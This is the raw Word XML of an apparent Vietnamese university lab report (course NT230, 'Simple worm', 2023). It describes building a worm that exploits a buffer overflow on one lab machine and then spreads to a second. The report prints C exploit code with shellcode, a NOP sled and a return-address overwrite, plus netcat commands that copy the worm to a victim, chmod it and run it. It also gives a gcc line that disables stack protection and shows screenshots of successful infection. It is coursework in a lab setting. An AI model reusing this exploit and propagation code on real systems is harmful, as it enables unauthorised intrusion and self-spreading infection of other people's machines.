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76594201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EC23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (Session 0</w:t>
      </w:r>
      <w:r w:rsidR="00EC23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256D11A" w14:textId="05D79DA6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C23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Simple worm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7529A711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EC23EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>03</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/2</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCEAD3" w14:textId="598315C0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482BE31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EE72EC" w:rsidRPr="00EE72EC">
        <w:t>NT230.N</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EE72EC" w:rsidRPr="00EE72EC">
        <w:t>21.ANT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246"/>
        <w:gridCol w:w="2414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3FD2E0E4" w:rsidR="008D0072" w:rsidRDefault="003C2417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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F74B605" w14:textId="0F8090E0" w:rsidR="008D0072" w:rsidRDefault="003C2417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14:paraId="69359CA4" w14:textId="6F794066" w:rsidR="008D0072" w:rsidRDefault="003C2417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1C179A3C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0CD653DA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5242AC61" w:rsidR="008D0072" w:rsidRDefault="008D0072" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pP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21AA0E0" w:rsidR="0027532A" w:rsidRDefault="0027532A" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kịch bản </w:t>
            </w:r>
            <w:r w:rsidR="00FA0470">
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="0059710E">
              <w:t>3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6EC9E76E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9271EF6" w14:textId="0AC2D09E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70892BD1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1D87D3EC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105810C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01828109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140119D4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538798E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4B72A51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094899EF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15E9C74A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3B910691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2C968C04" w:rsidR="00F13188" w:rsidRDefault="007D281E" w:rsidP="00F13188">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kịch bản </w:t>
      </w:r>
      <w:r w:rsidR="00FA0470">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="007D5063">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70096F6A" w14:textId="73D860EA" w:rsidR="00F84406" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r>
        <w:t>Nguồn tham khảo: ChatGPT</w:t>
      </w:r>
      <w:r w:rsidR="003E1444">
        <w:t xml:space="preserve"> (ChatGPT chỉ hỗ trợ hướng làm, hoàn toàn không có code mẫu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4589BF" w14:textId="74D11963" w:rsidR="007D5063" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r w:rsidRPr="007D5063">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F3E19C" wp14:editId="7AC1B887">
            <wp:extent cx="6115050" cy="34493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F08" w14:textId="7F0581A6" w:rsidR="007D5063" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Và với hướng dẫn của thầy, </w:t>
      </w:r>
      <w:r w:rsidR="00E33AA4">
        <w:t>ta sẽ thực hiện việc lây nhiễm bằng cách, thực hiện leo vào máy 2 sau đó lây nhiễm sang máy 3 có 2 cách:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C924559" w14:textId="333105EA" w:rsidR="00E33AA4" w:rsidRDefault="00E33AA4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Cách 1: sau khi lây nhiễm máy 2 thì ta sẽ thực hiện cố định một ip máy 3 để tự động worm leo sang (đã biết ip từ trước)</w:t>
      </w:r>
      <w:r w:rsidR="00714D6C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16568100" w14:textId="03797A1C" w:rsidR="003371FA" w:rsidRDefault="00E33AA4" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Cách 2: Sau khi lây nhiễm máy 2 thì ta sẽ thực hiện scan các ip có trong subnet mà máy ta đã lây nhiễm, từ đó thực hiện việc lan truyền </w:t>
      </w:r>
      <w:r w:rsidR="003371FA">
        <w:t>tự động</w:t>
      </w:r>
      <w:r w:rsidR="009637A3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9361C4" w14:textId="569E18A1" w:rsidR="003371FA" w:rsidRDefault="003371FA" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ở đây, ta sẽ chọn cách 1 do đã được cung cấp thông tin từ ip máy 3 trên vlab để thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="003A6B19">
        <w:t>. Việc thực hiện truyền worm ta sẽ thực hiện bằng lệnh “nc” với chức năng gửi và nhận file để thực hiện lây nhiễm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23C0F1" w14:textId="091F9590" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Đầu tiên ta sẽ thực hiện cải tiến code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB96319" w14:textId="3172A997" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ở câu C2 ta đã lây nhiễm được được một máy và ta thực hiện chỉnh hàm main thành hàm Exploit và thực hiện code thêm 1 hàm lây nhiễm là hàm Infect</w:t>
      </w:r>
      <w:r w:rsidR="003703FC">
        <w:t>, trong quá trình lây nhiễm ta sẽ thực hiện sử dụng net cat để lây nhiễm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ngoài ra để </w:t>
      </w:r>
      <w:r w:rsidR="00C91C54">
        <w:t>gọi port ta sẽ sử dụng thêm hàm listen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157B412" w14:textId="786B167A" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00200944">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Dưới đây là đoạn code của chương trình: (phần giải thích các hành động được trình bày trong chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39258ED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stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E532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stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C7CBA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string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBAB8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netdb.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0050B4F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&lt;netinet/in.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333BF7F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EA3D4F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generate 2 shellcode with different IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2CAAC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2A008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065B00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81F2A6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EA98E4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8\x1B\x40\x11\x17\x35\x11\x11\x11\x11\x50\x31\xC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9C4E94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66\x68\x11\x5c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2352EF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D5797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44F138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8AC0F4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BD2372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A9BE8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A3756C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807F8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4E30C7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56193A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B69916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BFD12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1\xcd\x80</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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6AE89A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0E2E46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B61AB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CF089B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2DFAC9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9EDBD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8\x1B\x40\x11\x16\x35\x11\x11\x11\x11\x50\x31\xC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09C247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66\x68\x11\x5c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12F83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6E4283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9E84E2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00C00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76F5A1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5DF465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199934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BB3DC5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E17DA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434C03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6BE7C4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4B1C30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1\xcd\x80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292945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C52AAE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lastRenderedPageBreak/>
        <w:t>// standard offset (probably must be modified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A73F23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RET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xbffff28b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D20B1C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BUFFER_SIZE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024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4FF7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NAME_SIZE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2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF3C3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 xml:space="preserve"> BUF_SIZE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064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1144B0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335735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global variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049625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F1BEF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02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3DB2AEE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gna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AEC47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570AE5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EDC85F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D0CFA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exploit function to send buffer to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F6A8B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port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2B2FB8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1768205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10AE841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finish declare variables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20DA32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30389E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734E3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host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hos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300E39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427801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A6A4F6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filling buffer with NOPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74A96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generating exploit buffer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59310A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ems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x9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5F3DB9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73D38A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gna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2B258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EF8E79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+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DD91F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DA827F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37112D6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907B52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+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hellcode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7BCEF0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62BE92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D9BE9F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finish copying shellcod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16C559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41B808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6E1EA79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911137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adding return address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F23B4F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90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;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;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+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7E306B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B851B7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    *(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]) =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R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C7B18D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974D8E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x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2B300B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finish adding return address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82F800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14EE5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create hostnam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AD5CD1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728E75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getting hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F8B3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hos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gethostbynam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BCD511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EACC67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create socke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5464DF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ing socket...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752915C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(AF_INET, SOCK_STREAM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4355D7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E4F86E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5BF742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7C3035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F64AC1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42B267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6F152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remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B009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create remot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5A253A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F7033B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tate Protocolfamily , then converting the hostname or IP address, and getting  port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7CCB9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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B776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*(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in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hos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-&gt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h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B41C8C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port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5C0198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connect to remot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A093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C3A3F1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onnecting with destination host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719271B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onne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)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A20C9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6EE6FB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440C6A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connec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411C23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854B8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527D4E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send exploit buffer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41E72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F2A3C5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ing exploit string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258BEC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19B997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95BDE9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4766D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E55338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sending data fail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5A7A20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B00DA6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AC7DA7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losing socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3015E04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249C8B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3A665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5194C39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31FB75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lastRenderedPageBreak/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heckSocket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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C975C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05B704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socket server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942826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(AF_INET, SOCK_STREAM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790A9E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3D207D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heck if socket is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B827FB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8698D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476BB2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9F5A8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04FC83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4FC1D40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59EF104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34FDBB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heckMy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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ADD61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CFB614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my_srv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF1B8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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E611D1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_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INADDR_ANY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA58A3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444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FB3524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D68CE9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bind socket to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C9DA9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bi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)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2D45A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57936F1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bind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E19DF5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199A42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E3A87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766E952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3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B5C886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7E8C64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listen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80B98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FDB4AB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ACE85C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2FEE223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DA28CE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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4004C20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11954CC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27AF694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Listening port 4444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F6598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7A61D3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heck socket server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABCADE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heckSocket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4367B98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heckMySr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7D46392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A0A77D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finish listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA4264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finish listen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A5D745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E44314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92423B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send worm to victim using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A63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lastRenderedPageBreak/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NetCatSendWor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24560D5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1449DC2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infection announcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70909EE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Starting connect from victim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72E28F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0E5719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ing shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4408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pw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6152A6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5079D2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0240FB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27BF50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1874496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030433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68E7BA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rec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32B839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7655A8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364FD3B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F7A4DC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205AE0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EF1C5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C34232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get into dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735DF8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Starting the infection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8CDB6C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leep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6EAD87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A7F797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0764A0F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nc -l 12345 &gt;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7F83E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8F36DB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DC5B01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Sending the worm to exploit the machin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400762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0C1D1A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26947D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 xml:space="preserve">"nc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%s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 xml:space="preserve"> 12345 &lt;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99070A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yste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53F18C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0A5E1B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hmod 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D12F1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chmod 777 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20956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B5682D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0E6B6D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execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E023C0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./c3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6C619D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8DAD8A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6EB730E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4DBCF6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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// infecting function to send buffer to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0995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pt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4F70F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0519546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7C887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22FB8D8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7717E3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_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803B55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15158C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infection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C863C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Start infecting the machine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AA9733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1B599E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ing socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD670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accep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ocket_serve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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sockadd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_stru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, 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EC5DE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= -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7EAD50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6FC0AD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Error: accept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E39DAD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C8E1F8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35D918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7A4ED7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netcat send worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37C19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NetCatSendWor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byte_siz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F0A3D8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E854E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lose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0E772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7FE5E2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146EB43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60394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ma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rgc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259E8B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E4142C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38AC33D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pthread_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14CFA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ndependent_threa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4131BF1C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C7D762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getting victim IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6429AB7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rgc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&gt;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2DA438D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102581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.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6113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signa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FFEC2E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2B879E3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CCD615A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3E1C641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6239324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.0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474BB3A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10.81.0.8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E37D4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EF057F8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56BB70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thread to listen to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705A9EED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ndependent_threa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thread_crea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1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F8FDA3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CB2597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exploit the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511E6DD6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500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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17689B83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322B23B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success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C396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The Exploitation succeed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6D3188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B61EE42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create thread to infect the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE185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independent_thread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thread_create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&amp;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CF7BA1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A9BB1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wait for thread to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B8C4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thread_joi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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>action_thread_2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F457AD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6C0F2E7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3337ED4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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// announce finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29956EF9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Finish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4CF05C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</w:p>
    <w:p w14:paraId="751D430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EA2973F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3E91556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6885501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5D5D703E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F457AD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The Exploitation failed</w:t>
      </w:r>
      <w:r w:rsidRPr="00F457AD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F457AD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4A7F315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A255070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457AD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F457AD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F457AD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48B8A11" w14:textId="77777777" w:rsidR="00F457AD" w:rsidRPr="00F457AD" w:rsidRDefault="00F457AD" w:rsidP="00F457AD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457AD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037AED80" w14:textId="77777777" w:rsidR="00F457AD" w:rsidRDefault="00F457AD" w:rsidP="00BA539D"/>
    <w:p w14:paraId="6010B4AB" w14:textId="461A0D1E" w:rsidR="00DC081D" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Build chương trình: Do có sử dụng hàm </w:t>
      </w:r>
      <w:r w:rsidR="001969AB">
        <w:t xml:space="preserve">pthread nên khi thực hiện build chương trình ta sẽ thực hiện lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="00200944" w:rsidRPr="00200944">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector -pthread -o</w:t>
      </w:r>
      <w:r w:rsidR="00200944">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> c3 c3.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F069904" w14:textId="39736312" w:rsidR="003A6B19" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:t>Thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC8CAC" w14:textId="2A172667" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:t>Kết quả tại máy 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D945CB" w14:textId="4645EA3C" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00200944">
      <w:r>
        <w:t xml:space="preserve">Chạy lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB27D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">./c3 10.81.0.7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584901A" w14:textId="60B39E51" w:rsidR="00DB27D2" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C82F9E" wp14:editId="268B3A3C">
            <wp:extent cx="6119446" cy="609404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r="74555" b="47094"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6134764" cy="61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A095" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F42C538" w14:textId="15356F23" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả tại máy 2:</w:t>
      </w:r>
      <w:r w:rsidR="00200944">
        <w:t xml:space="preserve"> Worm đã lây được máy 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF55F7E" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D2D5B7" w14:textId="21456C4F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7F58D874" wp14:editId="25079080">
            <wp:extent cx="6093387" cy="118989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" r="54832" b="76140"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6142570" cy="119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3CF8" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1173F0D4" w14:textId="2A6BF389" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả tại máy 3:</w:t>
      </w:r>
      <w:r w:rsidR="00200944">
        <w:t xml:space="preserve"> Worm đã lây được máy 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A8638" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E5B5D1" w14:textId="34C4B898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6DC0B4C4" wp14:editId="074CDAA0">
            <wp:extent cx="6047006" cy="1934308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r="73624" b="76651"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6084232" cy="19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5FBB" w14:textId="2F6771D6" w:rsidR="008E4431" w:rsidRDefault="008E4431" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E86DD9C" w14:textId="3C50CABC" w:rsidR="008E4431" w:rsidRDefault="008E4431" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Video demo kết quả: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="000C5092">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/bSvNp4MLM6c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EC5CB13" w14:textId="77777777" w:rsidR="008E4431" w:rsidRDefault="008E4431" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707B8DC2" w14:textId="77777777" w:rsidR="00BF20B1" w:rsidRDefault="00BF20B1" w:rsidP="004F64FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72980AFE" w14:textId="77777777" w:rsidR="00BF20B1" w:rsidRDefault="00BF20B1" w:rsidP="004F64FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064F2715" w14:textId="4EFA478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2" w:name="OLE_LINK29"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK30"/>
      <w:r>
        <w:t>xây dựng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3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AA90" w14:textId="77777777" w:rsidR="00B83FBF" w:rsidRDefault="00B83FBF" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="34D2E2E5" w14:textId="77777777" w:rsidR="00B83FBF" w:rsidRDefault="00B83FB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3F61" w14:textId="77777777" w:rsidR="00B83FBF" w:rsidRDefault="00B83FBF" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="69AEB2FB" w14:textId="77777777" w:rsidR="00B83FBF" w:rsidRDefault="00B83FBF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FDFCCD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EC23E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EC23EE">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> Simple Worm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E82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0C1D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2325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69AB"/>
    <w:rsid w:val="00197611"/>
    <w:rsid w:val="001A184F"/>
    <w:rsid w:val="001A382F"/>
    <w:rsid w:val="001A647D"/>
    <w:rsid w:val="001A775F"/>
    <w:rsid w:val="001B03C5"/>
    <w:rsid w:val="001B1134"/>
    <w:rsid w:val="001B4477"/>
    <w:rsid w:val="001B474F"/>
    <w:rsid w:val="001B5840"/>
    <w:rsid w:val="001B6632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944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E4123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1FA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3FC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B19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444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09AD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06F45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3EBA"/>
    <w:rsid w:val="00536101"/>
    <w:rsid w:val="00541A11"/>
    <w:rsid w:val="005444EB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5DA"/>
    <w:rsid w:val="00584A5D"/>
    <w:rsid w:val="005860C4"/>
    <w:rsid w:val="00592010"/>
    <w:rsid w:val="00592322"/>
    <w:rsid w:val="0059336A"/>
    <w:rsid w:val="00593AE6"/>
    <w:rsid w:val="00593F7C"/>
    <w:rsid w:val="00596D6A"/>
    <w:rsid w:val="0059710E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51FE"/>
    <w:rsid w:val="00696078"/>
    <w:rsid w:val="006A01B0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126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485C"/>
    <w:rsid w:val="00706856"/>
    <w:rsid w:val="0070708D"/>
    <w:rsid w:val="007078A5"/>
    <w:rsid w:val="00707FEB"/>
    <w:rsid w:val="00714D6C"/>
    <w:rsid w:val="00715AD4"/>
    <w:rsid w:val="00716559"/>
    <w:rsid w:val="00717C2F"/>
    <w:rsid w:val="00720373"/>
    <w:rsid w:val="00722283"/>
    <w:rsid w:val="0072540B"/>
    <w:rsid w:val="00725D1E"/>
    <w:rsid w:val="007265C3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5063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4431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5C3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CA5"/>
    <w:rsid w:val="009600F1"/>
    <w:rsid w:val="009613B6"/>
    <w:rsid w:val="009613E4"/>
    <w:rsid w:val="009625D5"/>
    <w:rsid w:val="009637A3"/>
    <w:rsid w:val="00963906"/>
    <w:rsid w:val="00964B1C"/>
    <w:rsid w:val="00965171"/>
    <w:rsid w:val="0096625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67753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02A6"/>
    <w:rsid w:val="00B415AB"/>
    <w:rsid w:val="00B418C6"/>
    <w:rsid w:val="00B42EB9"/>
    <w:rsid w:val="00B4482B"/>
    <w:rsid w:val="00B47E39"/>
    <w:rsid w:val="00B47FD8"/>
    <w:rsid w:val="00B50791"/>
    <w:rsid w:val="00B516DF"/>
    <w:rsid w:val="00B52169"/>
    <w:rsid w:val="00B52E29"/>
    <w:rsid w:val="00B52EE2"/>
    <w:rsid w:val="00B53A43"/>
    <w:rsid w:val="00B5445A"/>
    <w:rsid w:val="00B56AFE"/>
    <w:rsid w:val="00B574A5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3FBF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0B1"/>
    <w:rsid w:val="00BF24E3"/>
    <w:rsid w:val="00BF35A7"/>
    <w:rsid w:val="00BF43E1"/>
    <w:rsid w:val="00BF4757"/>
    <w:rsid w:val="00BF574F"/>
    <w:rsid w:val="00BF5AB6"/>
    <w:rsid w:val="00C002E8"/>
    <w:rsid w:val="00C01FB5"/>
    <w:rsid w:val="00C02876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4491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54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7D2"/>
    <w:rsid w:val="00DB5097"/>
    <w:rsid w:val="00DB59FE"/>
    <w:rsid w:val="00DB62F4"/>
    <w:rsid w:val="00DC081D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D77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3AA4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7AD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06"/>
    <w:rsid w:val="00F84456"/>
    <w:rsid w:val="00F8653C"/>
    <w:rsid w:val="00F8656D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8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msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004B09AD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4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67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SvNp4MLM6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44</cp:revision>
  <cp:lastPrinted>2023-04-02T15:01:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T04:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-02T17:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>